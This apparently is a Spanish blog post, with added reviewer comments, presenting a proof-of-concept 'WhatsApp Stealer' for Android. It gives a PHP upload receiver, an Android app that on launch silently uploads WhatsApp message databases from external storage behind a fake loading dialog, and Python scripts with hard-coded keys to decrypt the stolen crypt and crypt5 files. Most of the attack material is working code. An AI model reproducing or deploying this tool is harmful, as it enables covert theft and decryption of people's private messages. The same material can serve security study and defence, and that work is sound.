en Android (PoC)
Hace unos meses se publicó en algunos foros una guía paso a paso para
montar nuestro propio Whatsapp Stealer y ahora Bas Bosschert ha
publicado una PoC con unas pocas modificaciones.
Para empezar con la prueba de concepto (y ojo que digo PoC que nos
conocemos ;)) tenemos que publicar en nuestro webserver un php para
subir las bases de datos de Whatsapp:
<?php
// Upload script to upload Whatsapp database
// This script is for testing purposes only.
//
// Receives one multipart/form-data upload in the form field "file" and echoes
// its metadata back in the HTTP response. The rest of the script is elided on
// the page ("..."), so what happens to the file after the echo lines is not
// shown here.
// NOTE(review): no authentication and no check of the uploaded content appear
// in the visible part of the script.

// Presumably the directory received files are meant to end up in; it is not
// referenced in the visible lines.
$uploaddir = "/tmp/whatsapp/";
// A non-zero error code means PHP itself reported a problem with the upload.
if ($_FILES["file"]["error"] > 0)
{
echo "Error: " . $_FILES["file"]["error"] . "<br>";
}
else
{
// NOTE(review): "name" and "type" are supplied by the client and are written
// into the HTML response unescaped; they would need htmlspecialchars() before
// being echoed.
echo "Upload: " . $_FILES["file"]["name"] . "<br>";
echo "Type: " . $_FILES["file"]["type"] . "<br>";
echo "Size: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
// "tmp_name" is the temporary server-side path PHP assigned to the upload.
echo "Stored in: " . $_FILES["file"]["tmp_name"];
...
file_uploads = On
post_max_size = 32M
upload_max_filesize = 32M
<!-- Reviewer note: these two permissions are everything the PoC requests:
     read access to shared external storage and network access. No root and
     no WhatsApp-specific permission is involved, so at the API levels
     declared below any installed app holding this pair could read files that
     another app leaves on shared external storage. Data kept there has to be
     treated as readable by other apps. -->
<uses-permission
android:name="android.permission.READ_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.INTERNET" />
<!-- Declares support from API level 8 upwards and targets API level 19. -->
<uses-sdk
android:minSdkVersion="8"
android:targetSdkVersion="19" />
<!-- One application with a single activity, MainActivity, registered as the
     launcher entry point (MAIN action + LAUNCHER category). Icon, label and
     theme are taken from the app's own resources; allowBackup is set to
     true. -->
<application
android:allowBackup="true"
android:icon="@drawable/ic_launcher"
android:label="@string/app_name"
android:theme="@style/AppTheme" >
<activity
android:name="bb.security.whatsappupload.MainActivity"
android:label="@string/app_name" >
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER"
/>
</intent-filter>
</activity>
</application>
</manifest>
<!-- Layout for MainActivity: a full-screen RelativeLayout holding a single
     TextView, centred horizontally and offset 179dp from the top, that shows
     the hello_world string resource. This layout contains no control and no
     text relating to the file upload. -->
<RelativeLayout
xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:tools="http://schemas.android.com/tools"
android:layout_width="match_parent"
android:layout_height="match_parent"
android:paddingBottom="@dimen/activity_vertical_margin"
android:paddingLeft="@dimen/activity_horizontal_margin"
android:paddingRight="@dimen/activity_horizontal_margin"
android:paddingTop="@dimen/activity_vertical_margin"
tools:context=".MainActivity" >
<TextView
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:layout_alignParentTop="true"
android:layout_centerHorizontal="true"
android:layout_marginTop="179dp"
android:text="@string/hello_world"
android:textSize="24sp" />
</RelativeLayout>
package bb.security.whatsappupload;
/*
* This application is for testing purposes only.
* Use of this application is at your own risk.
*/
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.net.HttpURLConnection;
import java.net.MalformedURLException;
import java.net.URL;
import android.os.AsyncTask;
import android.os.Bundle;
import android.os.Environment;
import android.app.Activity;
import android.app.ProgressDialog;
import android.util.Log;
import android.view.Menu;
/**
 * Activity entry point: sets the main layout and starts the
 * {@code UploadWhatsApp} task straight away.
 *
 * <p>Reviewer note: the task is launched from {@code onCreate} itself, so it
 * runs as soon as the app is opened; no button press or confirmation by the
 * user is involved.
 *
 * @param savedInstanceState previously saved state, forwarded to the superclass
 */
@Override
protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_main);

    final UploadWhatsApp uploadTask = new UploadWhatsApp();
    uploadTask.execute();
}
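/**
 * Builds the options menu from the {@code R.menu.main} resource.
 *
 * @param menu the menu to inflate the items into
 * @return always {@code true}
 */
@Override
public boolean onCreateOptionsMenu(Menu menu) {
    // Inflate the menu; this adds items to the action bar if it is present.
    // (The page's line wrap had pushed the end of this comment onto a line of
    // its own, where it would be parsed as code.)
    getMenuInflater().inflate(R.menu.main, menu);
    return true;
}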
@SuppressWarnings("deprecation")
private void uploadFile(String file) {
HttpURLConnection conn = null;
DataOutputStream dos = null;
DataInputStream inStream = null;
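/**
 * Shows a progress dialog before the background work starts and keeps a
 * reference to it in {@code progressDialog}.
 *
 * <p>Reviewer note: the dialog text only says that the application is
 * loading, and it is created with {@code cancelable = false}, so the user
 * cannot dismiss it; nothing shown here mentions that files are being sent.
 */
@Override
protected void onPreExecute() {
    // Create a new progress dialog. The title literal is rejoined here: the
    // page's line wrap had split it across two lines, which is not valid Java.
    progressDialog = ProgressDialog.show(
            MainActivity.this,
            "Loading Application, please wait...", // title
            "Loading, please wait...",             // message
            false,                                 // indeterminate
            false);                                // cancelable
}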
// Body of the background task; its method signature is not shown on the page.
// Builds the paths of three files under the shared external-storage root,
// all inside WhatsApp/Databases: the encrypted message store, a plaintext
// message store, and wa.db.
String fileWACrypt =
Environment.getExternalStorageDirectory()
.getPath() + "/WhatsApp/Databases/msgstore.db.crypt";
String fileWAPlain =
Environment.getExternalStorageDirectory()
.getPath() + "/WhatsApp/Databases/msgstore.db";
String fileWAwa = Environment.getExternalStorageDirectory()
.getPath() + "/WhatsApp/Databases/wa.db";
// Each path is passed to uploadFile(), whose body is cut off on the page.
// NOTE(review): for detection, the observable behaviour is an app other than
// WhatsApp opening these paths and then making an outbound HTTP request
// (uploadFile declares an HttpURLConnection); confirm against the full source.
MainActivity.this.uploadFile(fileWACrypt);
MainActivity.this.uploadFile(fileWAPlain);
MainActivity.this.uploadFile(fileWAwa);
return null;
}
}
}
#!/usr/bin/env python
# Decrypts the msgstore.db.crypt file named by the first command-line argument
# and writes the result to msgstore.db in the current directory.
# Python 2 syntax (print statement, str.decode('hex')); the page has stripped
# the indentation of the try/except bodies.
#
# Reviewer note: the key below is a constant in the script, identical for
# every input file, and no per-user or per-device value enters the
# decryption. The .crypt wrapper therefore gives no confidentiality against
# anyone who can read the file; protection has to come from where the file is
# stored.
import sys
from Crypto.Cipher import AES
# The bare except turns any failure to read argv[1] (normally a missing
# argument) into the usage message and exit status 1.
try:
wafile=sys.argv[1]
except:
print "Usage: %s <msgstore.db.crypt>" % __file__
sys.exit(1)
# 48 hex digits decode to 24 bytes, i.e. an AES-192 key.
key = "346a23652a46392b4d73257c67317e352e3372482177652c".decode('hex')
# Mode constant 1 is AES.MODE_ECB in PyCrypto: no IV is used and every
# 16-byte block is processed independently.
cipher = AES.new(key,1)
# Reads the whole input into memory, decrypts it in one call and overwrites
# msgstore.db; neither file handle is closed explicitly.
open('msgstore.db',"wb").write(cipher.decrypt(open(wafile,"rb").read()))
#!/usr/bin/env python
"""
48bits presents:
8===============================================D~~~
WhatsApp msgstore crypt5 decryptor by grbnz0 and nullsub
8===============================================D~~~
"""
# Decrypts a crypt5 message store: argv[1] is the encrypted file, argv[2] is a
# string that is hashed into the key, and the plaintext is written to stdout.
# Python 2 syntax (print statement, file(), xrange); the page has stripped all
# indentation.
#
# Reviewer note: the key is the constant below XORed with MD5(argv[2]) and the
# IV is a constant. No random salt and no secret stored outside the script is
# involved, so the confidentiality of a crypt5 file rests entirely on argv[2]
# being unknown to whoever holds the file.
import sys
import hashlib
# StringIO is imported but not used anywhere in the script.
import StringIO
from M2Crypto import EVP
# Fixed 24-byte base key (AES-192, matching 'aes_192_cbc' below).
key = bytearray([141, 75, 21, 92, 201, 255, 129, 229, 203, 246, 250, 120,
25, 54, 106, 62, 198, 33, 166, 86, 65, 108, 215, 147])
# Fixed 16-byte IV. The page's line wrapping has split this statement and one
# of its hex literals across lines.
iv =
bytearray([0x1E,0x39,0xF3,0x69,0xE9,0xD,0xB3,0x3A,0xA7,0x3B,0x44,0x2B,0xB
B,0xB6,0xB0,0xB9])
# decrypt(db, acc): db is the path of the encrypted file; acc is the string
# mixed into the key (presumably an account identifier; the page does not say).
def decrypt(db,acc):
# Read the whole encrypted file into memory.
fh = file(db,'rb')
edb = fh.read()
fh.close()
m = hashlib.md5()
m.update(acc)
md5 = bytearray(m.digest())
# XOR each of the 24 key bytes with a digest byte; the digest has 16 bytes, so
# i&0xF wraps and digest bytes 0-7 are reused for key bytes 16-23. This
# modifies the module-level key in place, so a second call in the same process
# would start from an already altered key.
for i in xrange(24): key[i] ^= md5[i&0xF]
# op=0 selects decryption in M2Crypto's EVP.Cipher.
cipher = EVP.Cipher('aes_192_cbc', key=key, iv=iv, op=0)
sys.stdout.write(cipher.update(edb))
sys.stdout.write(cipher.final())
if __name__ == '__main__':
# Exactly two arguments are required, although the usage text below does not
# name them.
if len(sys.argv) != 3:
print 'usage %s > decrypted.db' % sys.argv[0]
else:
decrypt(sys.argv[1],sys.argv[2])